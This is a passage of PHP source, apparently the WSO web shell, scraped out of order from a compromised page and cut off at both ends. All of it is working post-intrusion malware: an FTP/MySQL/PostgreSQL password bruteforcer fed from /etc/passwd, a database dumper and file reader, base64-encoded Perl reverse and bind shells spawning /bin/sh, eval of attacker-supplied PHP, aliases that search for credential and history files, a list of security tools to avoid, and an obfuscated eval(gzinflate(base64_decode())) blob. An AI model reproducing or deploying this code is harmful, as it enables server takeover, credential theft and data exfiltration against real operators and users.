'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = 'host=''.$ip.'' port=''.$port.'' user=''.$login.'' password=''.$pass.'' dbname=postgres'; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(':', $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(':', $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ''; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo 'Attempts: $attempts Success: $success

'; } echo '

Bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect('host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname') ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query('SHOW databases'); break; case 'pgsql': return $this->res = $this->query('SELECT datname FROM pg_database WHERE datistemplate!='t''); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query('select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog''); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query('SELECT LOAD_FILE(''.addslashes($str).'') as file')); break; case 'pgsql': $this->query('CREATE TABLE wso2(file text);COPY wso2 FROM ''.addslashes($str).'';select file from wso2;'); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode('\n',$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].';\n'; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ';\n\n'; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = 'NULL'; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = '''.@mysql_real_escape_string($v).'''; $columns[] = '`'.$k.'`'; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(', ', $columns).') VALUES \n\t('.implode(', ', $item).')'; $head = false; } else $sql .= '\n\t,('.implode(', ', $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ';\n\n'); else echo(';\n\n'); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = '''.addslashes($v).'''; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(', ', $columns).') VALUES ('.implode(', ', $item).');'.'\n'; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename=dump.sql'); header('Content-Type: text/plain'); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } wsoHeader(); echo '

Sql browser

TypeHostLoginPasswordDatabase
'; $tmp = ''; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } $db->listDbs(); echo ''; } else echo $tmp; }else echo $tmp; echo ' count the number of rows
'; if(isset($db) && $db->link){ echo '
'; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ''; } echo '
Tables:

'; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo ' '.$value.'' . (empty($_POST['sql_count'])?' ':' ({$n['n']})') . '
'; } echo '
File path:
'; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo ''.$_POST['p2'].' ({$num['n']} records) Page # '; echo ' of $pages'; if($_POST['p3'] > 1) echo ' < Prev'; if($_POST['p3'] < $pages) echo ' Next >'; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo '

'; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo '

'; echo '

'; if($_POST['type']=='mysql') { $db->query('SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y''); if($db->fetch()) echo '
Load file
'; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7'; $bind_port_p='IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0='; echo '

Network tools

Bind port to /bin/sh [perl]
Port:
Back-connect [perl]
Server: Port:

'; if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,'w') or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpp') { cf('/tmp/bp.pl',$bind_port_p); $out = wsoEx('perl /tmp/bp.pl '.$_POST['p2'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bp.pl').'
'; unlink('/tmp/bp.pl'); } if($_POST['p1'] == 'bcp') { cf('/tmp/bc.pl',$back_connect_p); $out = wsoEx('perl /tmp/bc.pl '.$_POST['p2'].' '.$_POST['p3'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bc.pl').'
'; unlink('/tmp/bc.pl'); } } echo '
'; wsoFooter(); } function actionRC() { if(!@$_POST['p1']) { $a = array( 'uname' => php_uname(), 'php_version' => phpversion(), 'wso_version' => WSO_VERSION, 'safemode' => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); exit; ?>'>aasa (0)
Password:
'); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == 'win') $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace('\\', '/', $home_cwd); $cwd = str_replace('\\', '/', $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( 'List Directory' => 'dir', 'Find index.php in current dir' => 'dir /s /w /b index.php', 'Find *config*.php in current dir' => 'dir /s /w /b *config*.php', 'Show active connections' => 'netstat -an', 'Show running services' => 'net start', 'User accounts' => 'net user', 'Show computers' => 'net view', 'ARP Table' => 'arp -a', 'IP Configuration' => 'ipconfig /all' ); else $aliases = array( 'List dir' => 'ls -lha', 'list file attributes on a Linux second extended file system' => 'lsattr -va', 'show opened ports' => 'netstat -an | grep -i listen', 'process status' => 'ps aux', 'Find' => '', 'find suid' => 'find / -type f -perm -04000 -ls', 'find suid in current dir' => 'find . -type f -perm -04000 -ls', 'find sgid' => 'find / -type f -perm -02000 -ls', 'find sgid files in current dir' => 'find . -type f -perm -02000 -ls', 'find config.inc.php' => 'find / -type f -name config.inc.php', 'find config*' => 'find / -type f -name \'config*\'', 'find config* in current dir' => 'find . -type f -name \'config*\'', 'find writable folders and files' => 'find / -perm -2 -ls', 'find writable folders and files in current dir' => 'find . -perm -2 -ls', 'find service.pwd' => 'find / -type f -name service.pwd', 'find service.pwd files in current dir' => 'find . -type f -name service.pwd', 'find .htpasswd' => 'find / -type f -name .htpasswd', 'find .htpasswd files in current dir' => 'find . -type f -name .htpasswd', 'find .bash_history' => 'find / -type f -name .bash_history', 'find .bash_history files in current dir' => 'find . -type f -name .bash_history', 'find .fetchmailrc' => 'find / -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc', 'Locate' => '', 'locate httpd.conf' => 'locate httpd.conf', 'locate vhosts.conf' => 'locate vhosts.conf', 'locate proftpd.conf' => 'locate proftpd.conf', 'locate psybnc.conf' => 'locate psybnc.conf', 'locate my.conf' => 'locate my.conf', 'locate admin.php' =>'locate admin.php', 'locate cfg.php' => 'locate cfg.php', 'locate conf.php' => 'locate conf.php', 'locate config.dat' => 'locate config.dat', 'locate config.php' => 'locate config.php', 'locate config.inc' => 'locate config.inc', 'locate config.inc.php' => 'locate config.inc.php', 'locate config.default.php' => 'locate config.default.php', 'locate config*' => 'locate config', 'locate .conf'=>'locate '.conf'', 'locate .pwd' => 'locate '.pwd'', 'locate .sql' => 'locate '.sql'', 'locate .htpasswd' => 'locate '.htpasswd'', 'locate .bash_history' => 'locate '.bash_history'', 'locate .mysql_history' => 'locate '.mysql_history'', 'locate .fetchmailrc' => 'locate '.fetchmailrc'', 'locate backup' => 'locate backup', 'locate dump' => 'locate dump', 'locate priv' => 'locate priv' ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo '' . $_SERVER['HTTP_HOST'] . ' - WSO ' . WSO_VERSION .'
'; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://exploit-db.com/search/?action=search&filter_description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = '?'; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode('/', $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= ''.$path[$i].'/'; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ''; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '
[ '.$k.' ]
' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . ' [exploit-db.com]
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER['SERVER_ADDR'] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
';eval(gzinflate(base64_decode('dZJNc5swEIb/iieTQ3ITuInLZHrAuBIrx9SA+dLFAxbBssRHQxMX//qqJk4y0+lhR6PZffTuu6vrrn3+tS1Ew7d88m1yRV3W7UyFssG2wAmefGStQ6RwMlAzT72OuyuRbnrPqVUNTiV5rU55GhxggXQ9iGU4ny38ttLsWE9Wlc5Vq4VmhF1d3i+mUK1DW6aGhyPFdPQikrG3MQKcIvw9wDDqnBmuMn2CY//DhDiIImzBxvAiUOii3RV1e67/q02xtQlimugoQFEcxTGOjOApjin9xKAspQ1L/TOzq/GUp7RnJD4UZqCWTjBlCbxQol5yIS/MT54ERvGmA0r3qbyWJb97IHvEXfv+cfgqOcEDM2MEhN59zMUa4PDmj9BX5sqLP+E3cfND2P/l1oQOawFjD+S8hz1LjCN3ZTvOSnbg9pVPjH2eHFuosxNbzE+rKTV12DmxUJHgrnDutDckHt99HGVWW7IM5Qxc5DmNjjrud2ZUlYP9vuvl0I95OT8xfS9M6zlPohaacbelgP7jH8nZ1cOkfM3VTZH35f2XLS93LS9vrj/9vNvbhz8= '))); } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?' (Writeable)':' (Not writable)'; echo '
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

'; } if (!function_exists('posix_getpwuid') && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists('posix_getgrgid') && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join('\n',$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,'r'))) { $out = ''; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf('%u', $s); if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists('scandir')) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, '\n') === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = 'MySql ('.mysql_get_client_info().')'; if(function_exists('mssql_connect')) $temp[] = 'MSSQL'; if(function_exists('pg_connect')) $temp[] = 'PostgreSQL'; if(function_exists('oci_connect')) $temp[] = 'Oracle'; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?'yes [view]':'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?'yes [view]':'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '
posix_getpwuid ('Read' /etc/passwd)
From
To
'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ''; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid).'\n'; } echo '
'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = 'document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='' . addcslashes(htmlspecialchars(ob_get_clean()), '\n\r\t\\'\0') . '';\n'; echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '

PHP info

'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('
'; } echo '

Execution PHP-code

'; echo ' send using AJAX
';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '
'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo 'Can't upload!'; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo 'Can't create!'; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == '..') || (basename($item) == '.') ) continue; $type = filetype($item); if ($type == 'dir') deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != '.') and ($f != '..')) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', 